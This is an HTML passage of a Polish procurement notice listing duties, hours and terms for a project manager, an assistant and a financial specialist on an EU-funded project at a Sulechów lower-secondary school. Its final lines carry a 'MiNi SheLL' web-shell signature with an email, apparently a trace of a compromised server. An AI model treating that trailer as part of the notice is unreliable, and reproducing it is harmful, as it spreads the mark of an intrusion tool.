    dowozami uczniów uzgodnionego z dyrektorem szkoły. 
-	organizacja zajęć,
-	zatwierdzenie planów zajęć; 
-   nadzór nad przebiegiem zajęć i nad prawidłowym ich dokumentowaniem;
-   hospitowanie zajęć;
-	bieżąca pomoc uczestnikom projektu; 
-	bieżąca współpraca z dyrektorem szkoły; 
-	prowadzenie korespondencji i rozmów z rodzicami uczniów; 
-	prowadzenie biura projektu;
-	pomoc w przygotowaniu zamówień publicznych.;
-	analiza budżetu; 
-	przygotowanie, opracowanie i przeprowadzenie wraz z asystentem ds. technicznych i  
     promocji:
a)	1 sprawozdania z realizacji planu rozwoju Gimnazjum nr 2 w Sulechowie w zakresie objętym   
      projektem,
b)	ankiet ewaluacyjnych wszystkich zajęć projektowych (dwukrotnie),
c)	3 ankiet badających poziom kompetencji osobistych uczestników projektu kształconych w    ramach zajęć Jak się uczyć?,
d)	3 testów interaktywnych badających poziom kompetencji z matematyki wśród wszystkich    uczestników,
e)	2 testów badających poziom kompetencji z fizyki i chemii wśród wszystkich uczestników    projektu.
-	nadzór nad przebiegiem wycieczki;
-	organizacja i poprowadzenie  Festiwalu Nauki; 
-	piecza nad ochroną danych osobowych,
-	dbałość o stan nieodpłatnie udostępnionych przez Dyrektora Szkoły pracowni -sali, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu,
-	przestrzeganie obowiązujących przepisów prawa i Statutu Szkoły, w której będą prowadzone zajęcia,
-	nadzorowanie prawidłowości przygotowania wymaganych sprawozdań do Instytucji  Pośredniczącej w wymaganych i obowiązujących terminach w oparciu o obowiązujące zapisy w  dokumentach programowych Programu Operacyjnego Kapitał Ludzki,
-	uzgadnianie z Instytucją Pośredniczącą i przekazywanie jej w formie pisemnej informacji o 
     dokonywanych zmianach w projekcie,
-	wprowadzanie w Generatorze Wniosków Aplikacyjnych zmian do projektu w oparciu o   obowiązujące zapisy zawarte w dokumentacji konkursowej, umowie o dofinansowanie projektu, 
    dokumentacji programowej Programu Operacyjnego Kapitał Ludzki,
-	sporządzanie w zakresie merytorycznym wniosków o płatność w Generatorze Wniosków  Płatniczych i bieżąca współpraca ze specjalistą ds. finansowych projektu, 
-	współudział w sporządzaniu załączników do wniosku o płatność,
-	sporządzanie formularza Podsystemu monitorowania Europejskiego Funduszu Społecznego,
-	przygotowanie zaplecza technicznego projektu w tym nadzór nad instalacją zakupionego sprzętu    laboratoryjnego i jego zabezpieczenie,
-	codzienna dyspozycyjność w trakcie realizacji całego projektu.
-	śledzenie dokumentów, wytycznych, które w trakcie realizacji projektu mogą ulec zmianie w  celu zapewnienia zgodności projektu z wytycznymi jak również prawodawstwem polskim i Unii  Europejskiej,
-	opisywanie faktur zgodnie z wymogami wynikającymi z przepisów dotyczących wdrażania programów współfinansowanych z Europejskiego Funduszu Społecznego Programu    Operacyjnego Kapitał Ludzki, 
- 	zatwierdzanie list płac; sprawdzanie faktur pod względem merytorycznym; 
-	przygotowanie i uporządkowanie oryginałów dokumentacji oraz przekazanie jej do archiwum Gminy a kopii do archiwum szkoły. 
-	sporządzanie miesięcznych kart czasu pracy oraz udostępnienia jej Zleceniodawcy w ramach  rozliczenia wynagrodzenia.
Miejsce i czas wykonywania obowiązków:  
Biuro projektu będzie czynne min. 8h w tygodniu w godz. od 15.00 do 17.00 z czego minimum 4 godziny tygodniowo będzie dyżurował kierownik projektu. W miesiącu kierownik musi przepracować minimum  60 godzin. Biuro  znajdować się będzie w Gimnazjum Nr 2 im. Jana Pawła II w Sulechowie przy ul. 1-Maja 7. Ze względu na ochronę danych osobowych dostęp do części dokumentacji projektowej jest możliwy wyłącznie na miejscu.  Do celów projektowych w biurze jest zagwarantowany dostęp do niezbędnych urządzeń technicznych i telefonu będących w bazie szkoły. Cała dokumentacja merytoryczna projektu i kopie dokumentów finansowych znajdować się będą w biurze projektu. 
Zadania będą realizowane od dnia podpisania umowy, nie wcześniej niż od 1 listopada 2012 r. do 30 czerwca 2014 r. z wyłączeniem miesięcy wakacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE B - Asystent ds. technicznych i promocji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE B - asystent ds. technicznych i promocji - Osoba na tym stanowisku musi posiadać wykształcenie pedagogiczne i posiadać ukończone szkolenie z prowadzenia i rozliczania projektu w ramach Programu Operacyjnego Kapitał Ludzki. Wykonawca, na każde wezwanie Zleceniodawcy, musi okazać się posiadanymi dokumentami potwierdzającymi wykształcenie oraz ukończenie szkoleń.
1.2.1.	Zadania realizowane przez Asystent ds. technicznych i promocji projektu:
-	opracowywanie sprawozdania z ewaluacji osiągnięć uczestników projektu,
-	codzienna dyspozycyjność w trakcie realizacji projektu,
-	przygotowanie ankiet ewaluacyjnych i oceniających,
-	nadzór nad wydawaniem posiłków dla uczniów w czasie zajęć projektowych,
-	aktualizacja formularza Podsystemu monitorowania Europejskiego Funduszu Społecznego,
-	bieżąca pomoc uczestnikom projektu; 
-	prowadzenie biura,
-	organizacja zaopatrzenia, 
-	opisywanie faktur; 
-	pomoc w przygotowaniu sprawozdań merytorycznych; 
-	wykonanie projektów materiałów promocyjnych i organizacja ich montażu; 
-	przygotowanie i realizacja strategii rekrutacji uczestników projektu (opracowanie regulaminu    rekrutacji, nadzór nas przygotowaniem formularzy rekrutacyjnych zgodnie z wytycznymi 
       Programu Operacyjnego Kapitał Ludzki), przeprowadzenie rekrutacji uczestników projektu,
-	zebranie deklaracji od uczestników projektu i ich rodziców;
-	zredagowanie i umieszczenie artykułów informujących o projekcie, jego przebiegu      i zakończeniu  na stronie www szkoły, Gminy Sulechów, w Biuletynie Informacyjnym Gminy,      szkolnej gazetce  i gazetach lokalnych; 
-	oznakowanie sprzętu i materiałów dydaktycznych zgodnie z wytycznymi dotyczącymi    oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki; 
-	opracowanie projektu dziennika zajęć;
-	przygotowanie formularzy i dokumentowanie przebiegu projektu;
-	organizacja wycieczki i Festiwalu Nauki;
-	opracowanie i zamówienie certyfikatu Młody Chemik i Fizyk;
-	uporządkowanie dokumentacji projektowej; 
-	opracowanie, przeprowadzenie i analiza testów kompetencji;
-	przygotowanie, opracowanie i przeprowadzenie wraz z kierownikiem projektu:
a)	1 sprawozdania z realizacji planu rozwoju Gimnazjum nr 2 w Sulechowie w zakresie objętym  
      projektem,
b)	ankiet ewaluacyjnych wszystkich zajęć projektowych (dwukrotnie)
c)	3 ankiet badających poziom kompetencji osobistych uczestników projektu kształconych w 
     ramach zajęć Jak się uczyć?
d)	3 testów interaktywnych badających poziom kompetencji z matematyki wśród wszystkich 
     uczestników
e)	2 testów badających poziom kompetencji z fizyki i chemii wśród wszystkich uczestników      projektu
- 	wykonywanie innych czynności zleconych przez kierownika projektu,
-	sporządzanie miesięcznych kart czasu pracy oraz udostępnienia jej Zleceniodawcy w ramach   rozliczenia wynagrodzenia.


Miejsce i czas wykonywania obowiązków:  
Biuro projektu będzie czynne min. 8h w tygodniu w godz. od 15.00 do 17.00 z czego minimum 3 godziny tygodniowo będzie dyżurował asystent ds. technicznych i promocji. W miesiącu asystent ds. technicznych i promocji musi przepracować minimum 50 godzin.  Biuro  znajdować się będzie w Gimnazjum Nr 2 im. Jana Pawła II w Sulechowie przy ul. 1-Maja 7. Ze względu na ochronę danych osobowych dostęp do części dokumentacji projektowej jest możliwy wyłącznie na miejscu.  Do celów projektowych w biurze jest zagwarantowany dostęp do niezbędnych urządzeń technicznych i telefonu będących w bazie szkoły. Cała dokumentacja merytoryczna projektu i kopie dokumentów finansowych znajdować się będą w biurze projektu.
Zadania będą realizowane od dnia podpisania umowy, nie wcześniej niż od 1 listopada 2012r. do 30 czerwca 2014r. z wyłączeniem miesięcy wakacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE C - Specjalista ds. finansowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE C - Specjalista ds. finansowych - osoba na tym stanowisku musi posiadać doświadczenie w rozliczaniu projektów w ramach Programu Operacyjnego Kapitał Ludzki. Wykonawca, na każde wezwanie Zleceniodawcy, musi okazać się posiadanymi dokumentami potwierdzającymi doświadczenie.
1.3.1.	Zadania realizowane przez Specjalista ds. finansowych projektu:
-	weryfikowanie i akceptowanie pod względem formalnym i rachunkowym dokumentów, które powstały w projekcie, z uwzględnieniem zasad kwalifikowalności wydatków.
-	współpraca z osobami zaangażowanymi w realizację projektu.
-	bieżący monitoring przepływów pieniężnych - czuwanie nad terminowym regulowaniem płatności.
-	sporządzanie kompletu dokumentów rozliczeniowych zgodnie z ustalonym harmonogramem płatności: wniosków o płatność w aplikacji Generatora Wniosków Płatniczych Programu Operacyjnego Kapitał Ludzki /części finansowej/, załącznika nr 1 do wniosku o płatność, składowych wynagrodzeń, wyciągów bankowych potwierdzających zrealizowane wydatki itp.
-	sporządzanie sprawozdań z realizacji wydatków projektu według obowiązujących przepisów dotyczących sprawozdawczości budżetowej.
-	udzielanie bieżących informacji Zleceniodawcy, personelowi zarządzającemu i Dyrekcji szkoły na temat stanu realizacji poszczególnych zadań projektu w ujęciu finansowym.
-	zapewnienie pomocy Zleceniodawcy w trakcie przeprowadzania kontroli zewnętrznych i wewnętrznych w okresie trwania projektu, jak również po jego realizacji.
-	sporządzanie miesięcznych kart czasu pracy oraz udostępnienia jej Zleceniodawcy w ramach rozliczenia wynagrodzenia.
-	sporządzanie wniosków płatniczych, 
-	finansowe rozliczanie każdej otrzymanej transzy;
-	sporządzanie listy płac z tytułu zawartych umów, 
-	sporządzanie w trakcie i na koniec projektu finansowego sprawozdania rozliczającego dotację;
-	prowadzenie korespondencji finansowej; 
-	analiza budżetu projektu,
-	wykonawca, na każde wezwanie Zleceniodawcy, musi okazać się posiadanymi dokumentami potwierdzającymi zdolność do wykonywania zamówienia.
Miejsce i czas wykonywania obowiązków: 
Biuro projektu będzie czynne min. 8h w tygodniu w godz. od 15.00 do 17.00 z czego minimum  3 godziny tygodniowo będzie dyżurował specjalista ds. płac. W miesiącu specjalista ds. finansowych musi przepracować minimum 40 godzin. Biuro  znajdować się będzie w Gimnazjum Nr 2 im. Jana Pawła II w Sulechowie przy ul. 1-Maja 7. Ze względu na ochronę danych osobowych dostęp do części dokumentacji projektowej jest możliwy wyłącznie na miejscu.  Do celów projektowych w biurze jest zagwarantowany dostęp do niezbędnych urządzeń technicznych i telefonu będących w bazie szkoły. Cała dokumentacja merytoryczna projektu i kopie dokumentów finansowych znajdować się będą w biurze projektu.
Zadania będą realizowane od dnia podpisania umowy, nie wcześniej niż od 1 listopada 2012r. do 30 czerwca 2014r. z wyłączeniem miesięcy wakacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com